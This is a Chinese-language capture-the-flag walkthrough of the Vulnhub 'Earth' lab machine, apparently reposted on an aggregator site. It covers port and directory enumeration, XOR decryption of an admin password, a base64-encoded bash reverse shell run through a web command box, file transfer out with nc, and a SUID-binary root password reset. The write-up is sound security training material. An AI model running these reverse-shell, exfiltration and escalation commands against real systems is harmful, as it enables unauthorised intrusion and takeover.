您的位置:首页 > 科技 > 能源 > 珠海最新消息今天_免费制作logo的软件_关键词搜索排名推广_企业培训方案

珠海最新消息今天_免费制作logo的软件_关键词搜索排名推广_企业培训方案

2024/12/23 10:29:04 来源:https://blog.csdn.net/m0_74077634/article/details/144231854  浏览:    关键词:珠海最新消息今天_免费制作logo的软件_关键词搜索排名推广_企业培训方案
珠海最新消息今天_免费制作logo的软件_关键词搜索排名推广_企业培训方案

Earth 靶机笔记

概述

这是一台 Vulnhub 的靶机,主要是

Earth 靶机地址:The Planets: Earth ~ VulnHub

一、nmap 扫描

1、端口扫描

-sT 以 TCP 全连接扫描,--min-rate 10000 以最低 10000 速率进行扫描,-p-进行全端口扫描,-o ports 结果输出到 ports 文件中

 
sudo nmap -sT --min-rate 10000 -p- -o ports 192.168.52.4
 
Nmap scan report for 192.168.52.4
Host is up (0.00042s latency).
Not shown: 65513 filtered tcp ports (no-response), 19 filtered tcp ports (host-unreach)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
MAC Address: 00:0C:29:5D:22:84 (VMware)
# Nmap done at Fri Nov 22 15:32:16 2024 -- 1 IP address (1 host up) scanned in 13.43 seconds

2、详细信息扫描

以-sT 以 tcp, -sV 探测版本, -sC 以默认脚本 扫描端口 $ports,-O 探测操作系统版本,输出到 details 文件中

sudo nmap -sT -sV -sC -p22,80,443 -O -o nmapscan/details 192.168.52.4

结果:

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey:
| 256 5b2c3fdc8b76e9217bd05624dfbee9a8 (ECDSA)
|_ 256 b03c723b722126ce3a84e841ecc8f841 (ED25519)
80/tcp open http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
| http-methods:
|_ Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after: 2031-10-10T23:26:31
|_http-title: Test Page for the HTTP Server on Fedora
| tls-alpn:
|_ http/1.1
MAC Address: 00:0C:29:5D:22:84 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5.4
OS details: Linux 5.4
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov 22 15:33:47 2024 -- 1 IP address (1 host up) scanned in 20.41 seconds

看到目标的两个域名信息 earth.localterratest.earth.local 我们将他写到 /etc/hosts 文件中

3、默认脚本扫描

nmap --script=vuln -p22,80,443 -o nmapscan/vuln 192.168.52.4
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
443/tcp open https
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
MAC Address: 00:0C:29:5D:22:84 (VMware)
# Nmap done at Fri Nov 22 15:34:49 2024 -- 1 IP address (1 host up) scanned in 42.87 seconds

二、web 渗透

看到目标开放了 80 和 443 端口,我们打开看看

80 端口

image-20241129121626743

443 端口

image-20241129121732311

是一个 webserver 的默认页面

我们还有两个域名同时也看一下,发现两个域名所透露出来的信息是一样的

image-20241129121855867

看样子是一个消息反馈的页面,而下面有 Previous Messages 也就是 曾经的消息 看样子是加密了,而解密出来很可能是我们感兴趣的内容。

走到这里我们可以进行目录爆破了,从而充分扩大我们的攻击面

sudo gobuster dir -u http://192.168.52.4 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
sudo gobuster dir -u https://192.168.52.4:443 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
sudo gobuster dir -u https://earth.local -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
sudo gobuster dir -u https://terratest.earth.local/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k

同时还可以加参数 -x zip,tar,txt 等后缀,扩大字典再次进行第二次扫描

通过目录爆破我们发现了 https://earth.local 下面有一个 /admin 的页面

image-20241129130000322

image-20241129130016844

是一个登陆页面

我们所知道的信息也就这些,当然我们在后边尝试几个可能的路径,像是:/robots.txt 这类的目录

image-20241129123152287

在 terratest.earth.local 域名下发现了一个 /testingnotes.*,尝试 fuzz 一下,发现是 /testingnotes.txt

发现了一段话

image-20241129123805084

关键的信息有:

采用 XOR,也就是异或加密

testdata.txt 内容是加密的密钥

terra 是用户名

查看 testdata.txt 内容

image-20241129125533558

 
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

我们来到 CyberChef 解密内容

image-20241129130229289

解密成功 earthclimatechangebad4humans 的重复字符串

这个应该就是密码,尝试在 admin 页面登陆

image-20241129130603687

image-20241129130615153

登录成功看到是一个命令执行的框

三、获得立足点

构造反弹 shell payload

image-20241129131045382

 
echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUyLjMvNDQ0NCAwPiYxJwo= | base64 -d | bash

在网页执行这个

kali 端开启监听

 
sudo rlwrap -cAr nc -lvnp 4444

image-20241129131427704

成功获得了初始的 shell

在 /var/earth_web 翻找到了 user 的 flag

image-20241129131839617

四、提权到 root

 
find / -perm -4000 -type f 2> /dev/null

image-20241129132033974

有一个 reset_root 文件,令我们很感兴趣,执行看看

image-20241129132935824

看来执行失败了

利用 nc 传输到 kali 本地进行分析

kali 执行

 
nc -lvp 4444 > reset_root

image-20241129132555460

靶机执行

 
cat /usr/bin/reset_root | nc 192.168.52.3 4444

看到传输完成

image-20241129132654189

 
chmod +x reset_root

利用 file 查看文件属性

 
file reset_root

image-20241129132834850

看到就是 linux 的可执行文件

利用 ltrace 看看它的函数调用

 
ltrace ./reset_root

image-20241129133049803

看到有几个文件是不存在的

程序尝试访问 /dev/shm/kHgTFI5G/dev/shm/Zw7bV9U5 和 /tmp/kcM0Wewe 这些文件,但访问失败(返回值为-1)

在靶机上创建这些文件

 
touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe

再次执行

 
reset_root

image-20241129133427606

看到 root 密码已经被我们重置为了 Earth

image-20241129134404140

成功获得了 root 权限

image-20241129134539245

找到了 root_flag

来一张照吧

 
[root@earth ~]# whoami
whoami
root
[root@earth ~]# uname -a
uname -a
Linux earth 5.14.9-200.fc34.x86_64 #1 SMP Thu Sep 30 11:55:35 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
[root@earth ~]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:5d:22:84 brd ff:ff:ff:ff:ff:ff
altname enp2s1
inet 192.168.52.4/24 brd 192.168.52.255 scope global dynamic noprefixroute ens33
valid_lft 1730sec preferred_lft 1730sec
inet6 fe80::f2c5:57e:d7af:5f01/64 scope link noprefixroute
valid_lft forever preferred_lft forever
[root@earth ~]# cat /var/earth_web/user_flag.txt
cat /var/earth_web/user_flag.txt
[user_flag_3353b67d6437f07ba7d34afd7d2fc27d]
[root@earth ~]# cat root_flag.txt
cat root_flag.txt
_-o#&&*''''?d:>b\_
_o/"`'' '',, dMF9MMMMMHo_
.o&#' `"MbHMMMMMMMMMMMHo.
.o"" ' vodM*$&&HMMMMMMMMMM?.
,' $M&ood,~'`(&##MMMMMMH\
/ ,MMMMMMM#b?#bobMMMMHMMML
& ?MMMMMMMMMMMMMMMMM7MMM$R*Hk
?$. :MMMMMMMMMMMMMMMMMMM/HMMM|`*L
| |MMMMMMMMMMMMMMMMMMMMbMH' T,
$H#: `*MMMMMMMMMMMMMMMMMMMMb#}' `?
]MMH# ""*""""*#MMMMMMMMMMMMM' -
MMMMMb_ |MMMMMMMMMMMP' :
HMMMMMMMHo `MMMMMMMMMT .
?MMMMMMMMP 9MMMMMMMM} -
-?MMMMMMM |MMMMMMMMM?,d- '
:|MMMMMM- `MMMMMMMT .M|. :
.9MMM[ &MMMMM*' `' .
:9MMk `MMM#" -
&M} ` .-
`&. .
`~, . ./
. _ .-
'`--._,dd###pp=""'
Congratulations on completing Earth!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_b0da9554d29db2117b02aa8b66ec492e]

这台靶机就被我们拿下了

最后

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com